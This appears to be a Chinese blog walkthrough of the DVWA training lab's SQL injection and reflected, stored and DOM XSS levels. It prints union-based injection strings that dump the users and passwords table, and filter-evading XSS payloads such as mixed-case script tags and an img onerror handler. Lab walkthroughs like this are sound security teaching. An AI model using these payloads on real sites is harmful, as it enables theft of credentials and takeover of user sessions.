dvwa 中 sql xss 漏洞

SQL Injection

medium

先观察页面,可以看到url中没有注入点,应该是post注入
在这里插入图片描述
使用burpsuite抓包,并将此报文send to repeater
在这里插入图片描述
第一次把id=1改为Id=1’
第二次改为id=1’’
send之后看response,从结果可见,这里输入是数值,不需要闭合,并且单引号应该是会被转义的

在这里插入图片描述
确定列数
id=1 order by 3 报错,列数为2列

爆库
id =1 union select 1,database
得到库名dvwa

爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
得到表名guestbook和users

爆列
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x64767761
得到列名user_id,first_name,last_name,user,password,avatar,last_login,failed_login

得到数据库内容
id=1 union select group_concat(user),group_concat(password) from users

high

在这里插入图片描述
输入 1’
页面报错
在这里插入图片描述
输入1’’在这里插入图片描述
因此闭合是单引号,并且没有转义单引号
确定列数
在这里插入图片描述
爆库
在这里插入图片描述
爆表
在这里插入图片描述
爆列
在这里插入图片描述
得到数据库内容
在这里插入图片描述

写一句话木马
在这里插入图片描述

reflected xss

medium

在这里插入图片描述
查看源代码,发现对script有一个替换,但没有过滤大小写,只需script中改几个大写就可以了
在这里插入图片描述
xss中写入sCRipt>alert(/xss/)</sCRipt> <scr<script>ipt>alert(/xss/)</script>

high

在这里插入图片描述
查看源代码,发现对script有一个正则的替换
在xss中写入
在这里插入图片描述
在这里插入图片描述

stored xss

medium

在这里插入图片描述
查看源代码,name多了一个对于script的过滤,但没有过滤大小写和重写,所以可以借此绕过。
因为name 对长度有限制,所以直接修改原代码,将长度变大
然后在name 中输入
在这里插入图片描述
在这里插入图片描述

high

查看源代码,可以得知本关的name在之前的基础上多了一下一个正则去去除script,所以换个触发就可以
同样要将name 的长度修改一下
输入
在这里插入图片描述

Dom xss

medium

在这里插入图片描述
查看源代码,可以发现本关卡对script有一个过滤,另外看源代码可以发现需要把输入闭合掉,所以还应该写一个
在这里插入图片描述
在这里插入图片描述

</optin></select><img src = 1 onerror = alert(/xss/)>

High

在这里插入图片描述
发现是黑名单,注释掉即可

  (此处有一个空格)#<script>alert(/xss/)</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值